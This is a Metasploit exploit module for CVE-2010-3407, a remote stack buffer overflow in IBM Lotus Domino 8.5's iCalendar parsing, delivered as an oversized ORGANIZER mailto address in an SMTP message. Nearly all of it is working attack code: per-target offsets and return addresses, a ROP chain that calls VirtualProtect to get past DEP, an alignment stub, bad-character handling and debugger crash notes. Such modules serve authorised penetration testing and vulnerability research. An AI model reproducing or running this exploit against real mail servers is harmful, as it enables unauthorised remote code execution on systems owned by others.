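##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Banner pattern shared by check and exploit (the two used to differ: the
  # exploit path had an unescaped '.').  NOTE(review): this also matches later
  # 8.5.x fix packs, some of which may already carry IBM's fix (swg21446515),
  # so a match only ever yields "Appears", never "Vulnerable".
  DOMINO_85_BANNER = /Lotus Domino Release 8\.5/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By
          sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"
          crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to
          gain arbitrary code execution.

          Note: In order to trigger the vulnerable code path, a valid Domino mailbox account
          is needed.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'A. Plaskett', # Initial discovery, poc
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2010-3407' ],
          [ 'OSVDB', '68040' ],
          [ 'ZDI', '10-177' ],
          [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]
        ],
        'Payload' => {
          # Bytes the ORGANIZER line cannot carry, per the "Badchars" notes at the
          # end of this file.  The 0x0a-0x0f block was missing from the original
          # list even though those notes record 0x0a/0x0d as "nocrash" and
          # 0x0b-0x0f as rewritten (0x0fXX); it is included here.  0x09 and 0x19
          # are not listed in the notes and stay allowed.  The forced alphanumeric
          # encoder avoids all of these anyway.
          'BadChars' => ([*(0x00..0x08)] + [*(0x0a..0x0f)] + [*(0x10..0x18)] + [*(0x1a..0x1f)] + [0x2c] + [*(0x80..0xff)]).pack("C*"),
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          # The decoder stub expects ECX to point at the encoded payload; the
          # non-DEP targets return into a JMP ECX for that reason.
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'EXITFUNC' => "process",
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Lotus Domino 8.5 on Windows 2000 SP4',
            {
              'Offset' => 2374, # Offset to EIP
              'Ret' => 0x6030582B, # JMP ECX
              'MaxBuffer' => 9010 # Total buffer size
            }
          ],
          [
            'Lotus Domino 8.5 on Windows Server 2003 SP0',
            {
              'Offset' => 2374, # Offset to EIP
              'Ret' => 0x6030582B, # JMP ECX (Domino\\nnotes.dll)
              'MaxBuffer' => 9010 # Total buffer size
            }
          ],
          [
            # DEP-enabled target: pivots into a ROP chain that builds a
            # VirtualProtect() frame (see build_rop_buffer)
            'Lotus Domino 8.5 on Windows Server 2003 SP2',
            {
              'Offset' => 2374, # Offset to EIP
              'Ret' => 0x604C4222, # ADD AL,0x5E ; RETN
              'EAX' => 0x7C35287F, # Initial CALL VirtualProtect addr to align (MSVCR71.dll)
              'EaxOffset' => 2342, # Offset to EAX
              'RopOffset' => 24, # Offset to ROP gadgets
              'MaxBuffer' => 9010 # Total buffer size
            }
          ],
        ],
        'DisclosureDate' => '2010-09-14',
        'DefaultTarget' => 2,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(25),
        OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),
        OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', ''])
      ]
    )
  end

  # Banner-only version check.
  #
  # Returns CheckCode::Unknown when no banner arrives within 5 seconds (the
  # service may be up but silent), CheckCode::Appears when the banner names
  # Domino 8.5, and CheckCode::Safe for any other banner.  The socket is
  # always released, even if the read raises.
  def check
    connect
    begin
      banner = (sock.get_once(-1, 5) || '').chomp
    ensure
      disconnect
    end

    return Exploit::CheckCode::Unknown if banner.empty?
    return Exploit::CheckCode::Appears if banner =~ DOMINO_85_BANNER

    Exploit::CheckCode::Safe
  end

  # Builds the overflow buffer for the selected target, wraps it in an
  # iCalendar message and delivers it over a plain SMTP session.
  #
  # Every command before DATA is checked for an explicit 4xx/5xx reply and the
  # run is aborted on rejection (an unknown MAILTO mailbox used to be ignored
  # and the message sent anyway).  The reply to the message body and to QUIT
  # is only logged, since the vulnerable router may already be going down.
  def exploit
    sploit = build_overflow_buffer
    message = build_ical_message(sploit)

    print_status("Trying target #{target.name}")

    connect

    # Get SMTP banner and refuse to fire at anything that is not Domino 8.5
    banner = (sock.get_once || '').chomp
    print_status("Banner: #{banner}")
    unless banner =~ DOMINO_85_BANNER
      disconnect
      fail_with(Failure::NoTarget, 'Remote service does not seem to be Lotus Domino 8.5')
    end

    smtp_command("HELO localhost\r\n")
    smtp_command("MAIL FROM: <#{datastore['MAILFROM']}>\r\n")
    smtp_command("RCPT TO: <#{datastore['MAILTO']}>\r\n")
    smtp_command("DATA\r\n")

    # Send malicious data (includes the <CRLF>.<CRLF> terminator)
    smtp_command(message, strict: false)

    smtp_command("QUIT\r\n", strict: false)

    handler
    disconnect
  end

  # Sends one SMTP command (or the DATA body) and returns the chomped reply.
  #
  # When +strict+ is true a reply starting with 4xx or 5xx disconnects and
  # fails the run.  An empty reply is tolerated in both modes so a slow or
  # silent server still receives the full exchange, as before.
  def smtp_command(line, strict: true)
    sock.put(line)
    reply = (sock.get_once || '').chomp
    print_status("Received: #{reply}")

    if strict && reply =~ /\A[45]\d\d/
      disconnect
      fail_with(Failure::UnexpectedReply, "Server rejected #{line.split.first}: #{reply}")
    end

    reply
  end

  # Appends random alpha filler to +buf+ so that it is exactly +total+ bytes.
  #
  # Aborts when +buf+ already exceeds +total+ (for instance an encoded payload
  # larger than the room before the saved return address).  Without this
  # guard the negative length would go to rand_text_alpha unchecked and a
  # misaligned buffer would be sent.  Returns +buf+.
  def pad_to(buf, total, what)
    room = total - buf.length
    if room < 0
      fail_with(Failure::BadConfig, "Encoded payload too large: #{what} overshot by #{-room} bytes")
    end
    buf << rand_text_alpha(room)
  end

  # Dispatches to the per-target buffer layout.
  def build_overflow_buffer
    case target.name
    when /Windows 2000 SP4/
      build_jmp_ecx_buffer(934)
    when /Server 2003 SP0/
      build_jmp_ecx_buffer(930)
    when /Server 2003 SP2/
      build_rop_buffer
    else
      fail_with(Failure::NoTarget, "No buffer layout for target '#{target.name}'")
    end
  end

  # Layout for the non-DEP targets: +lead+ bytes of filler, the encoded
  # payload, filler up to the saved return address, target.ret (a JMP ECX),
  # then filler up to MaxBuffer.  ECX is expected to point at the encoded
  # payload (see BufferRegister in the payload options).
  def build_jmp_ecx_buffer(lead)
    buf = ''
    buf << rand_text_alpha(lead)
    buf << payload.encoded
    pad_to(buf, target['Offset'], 'Offset')
    buf << [target.ret].pack('V')
    pad_to(buf, target['MaxBuffer'], 'MaxBuffer')
  end

  # Layout for the DEP target (Server 2003 SP2).
  #
  # Borrows a "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP:
  # target['EAX'] lands in EAX, the ADD AL,0x5E gadget in target.ret aligns it
  # to the call, and the ROP chain writes a VirtualProtect frame through ECX
  # before pivoting ESP onto it.  Shellcode max is ~1312 bytes per the
  # original author; pad_to enforces the actual limit at run time.
  def build_rop_buffer
    # NOTE(review): the DLL names in the gadget comments are the original
    # author's.  A few 0x60xxxxxx addresses are tagged nlsccstr.dll and a few
    # 0x62xxxxxx addresses nnotes.dll, which is inconsistent with the other
    # entries - verify the mapping before rebasing any of them.
    rop_gadgets =
      [
        # EAX should be aligned to CALL VirtualProtect at this point
        0x604F5728, # MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)
        # Set shellcode address
        0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x62454F32, # ADD AL,2B; RETN (nlsccstr.dll)
        0x603F7B38, # ADD AL,31; RETN (nnotes.dll)
        0x624B7040, # MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)
        # Set RETN value
        0x60577B7A, # XCHG EAX,EDX; RETN (nnotes.dll)
        0x62452E35, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x60606F4E, # ADD AL,5D; RETN (nlsccstr.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x603E6260, # DEC EAX; RETN (nnotes.dll)
        0x7C3A4C72, # MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)
        0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x60253B6D, # XCHG EAX,EBP; RETN (nnotes.dll)
        # Set Size (0x413)
        0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
        0x605A4B30, # MOV EAX,205; RETN (nnotes.dll)
        0x60592A36, # ADD EAX,107; RETN (nnotes.dll)
        0x603B4C27, # ADD AL,2B; RETN (nnotes.dll)
        0x624B7044, # MOV DWORD PTR DS:[ECX+8],EAX; RETN
        0x604C5225, # XOR EAX, EAX; RETN
        # newProtect
        0x60386C3C, # MOV AL,3B; RETN (nnotes.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624D4C27, # INC EAX; RETN (nlsccstr.dll)
        0x624B7048, # MOV DWORD PTR DS:[ECX+C],EAX; RETN
        # oldProtect
        0x602B7353, # MOV EAX,ESI; POP ESI; RETN (nnotes.dll)
        0x41414141, # ESI
        0x624B704C, # MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)
        # Call VirtualProtect
        0x6247282B, # MOV EAX,ECX; RETN (nlsccstr.dll)
        0x60276256, # XCHG EAX,ESP; RETN (nnotes.dll)
      ].pack("V*")

    # Short alphanumeric-safe stub that derives ECX from its own location
    align = ''
    align << "\x51" # PUSH ECX
    align << "\x58" # POP EAX
    align << "\x34\x43" # XOR AL,43
    align << "\x40" # INC EAX
    align << "\x34\x65" # XOR AL,65
    align << "\x50" # PUSH EAX
    align << "\x59" # POP ECX

    buf = ''
    buf << rand_text_alpha(1022)
    buf << align
    buf << payload.encoded
    pad_to(buf, target['EaxOffset'], 'EaxOffset')
    buf << [target['EAX']].pack('V')
    pad_to(buf, target['Offset'], 'Offset')
    buf << [target.ret].pack('V')
    buf << rand_text_alpha(target['RopOffset'])
    buf << rop_gadgets
    pad_to(buf, target['MaxBuffer'], 'MaxBuffer')
  end

  # Wraps +sploit+ in the SMTP DATA body: a text/calendar COUNTER reply whose
  # ORGANIZER mailto address carries the oversized string.  All other fields
  # are randomised filler.  The result ends with the <CRLF>.<CRLF> terminator.
  def build_ical_message(sploit)
    fname = rand_text_alpha(4)
    prod_id = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(13) + "@" + rand_text_alpha_upper(24)
    uid = rand_text_alpha_upper(15)
    summary = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(11)
    status = rand_text_alpha_upper(4)

    body = ''
    body << "Content-Type: text/calendar; method=COUNTER; charset=UTF-8\r\n"
    # NOTE(review): this bare "<name>.txt" line has no "Field:" syntax and is
    # not a well-formed header; kept as in the original module - presumably the
    # PoC's exact layout - confirm before changing.
    body << "#{fname}.txt\r\n"
    body << "MIME-Version: 1.0\r\n"
    body << "Content-Transfer-Encoding: 8bit\r\n"
    body << "BEGIN:VCALENDAR\r\n"
    body << "METHOD:COUNTER\r\n"
    body << "PRODID:-//#{prod_id}//\r\n"
    body << "VERSION:2.0\r\n"
    body << "BEGIN:VEVENT\r\n"
    body << "UID:#{uid}\r\n"
    body << "SEQ:2\r\n"
    body << "RRULE:aaaa\r\n"
    # The overflow: the whole buffer becomes the ORGANIZER mailto address
    body << "ORGANIZER:mailto:H@#{sploit}.com\r\n"
    body << "ATTENDEE;:Mailto:#{datastore['MAILTO']}\r\n"
    body << "SUMMARY:#{summary}\r\n"
    body << "DTSTART:20091130T093000Z\r\n"
    body << "DTEND:20091130T093000Z\r\n"
    body << "DTSTAMP:20091130T083147Z\r\n"
    body << "LOCATION:Location\r\n"
    body << "STATUS:#{status}\r\n"
    body << "END:VEVENT\r\n"
    body << "END:VCALENDAR\r\n"
    body << "\r\n.\r\n"
    body
  end
end

=begin
0:008> r
eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014
eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
42424242 ?? ???
0:008> !exchain
08daea2c: nRouter+511bb (004511bb)
08daffdc: kernel32!_except_handler3+0 (77e70abc)
CRT scope 0, filter: kernel32!BaseThreadStart+3a (77e4a92d)
func: kernel32!BaseThreadStart+4b (77e4a943)
Invalid exception stack at ffffffff
0:008> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
08da9cbc 43434343 0x42424242
08da9cc0 43434343 0x43434343
...
0:008> bl
0 e 602738f9 0001 (0001) 0:**** nnotes!MailCheck821Address+0xb09
0:008> u 602738f9
nnotes!MailCheck821Address+0xb09:
602738f9 e80239d9ff call nnotes!Cstrcpy (60007200)
602738fe eb02 jmp nnotes!MailCheck821Address+0xb12 (60273902)
60273900 33ff xor edi,edi
60273902 8d8dc0faffff lea ecx,[ebp-540h]
60273908 51 push ecx
60273909 8d95bcf6ffff lea edx,[ebp-944h]
6027390f 52 push edx
60273910 e8eb38d9ff call nnotes!Cstrcpy (60007200)

Badchars:
0x01=0x0F21, 0x02=0x0f22, 0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25, 0x06=0x0f26, 0x07=0x0f27
0x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e 0x0f=0x0f2f,
0x10=0x0f30, 0x11=0x0f31, 0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34, 0x15=0x0f35, 0x16=0x0f36,
0x17=0x0f37, 0x18=0x0f38, 0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c, 0x1d=0x0f3d, 0x1e=0x0f3e,
0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""
=end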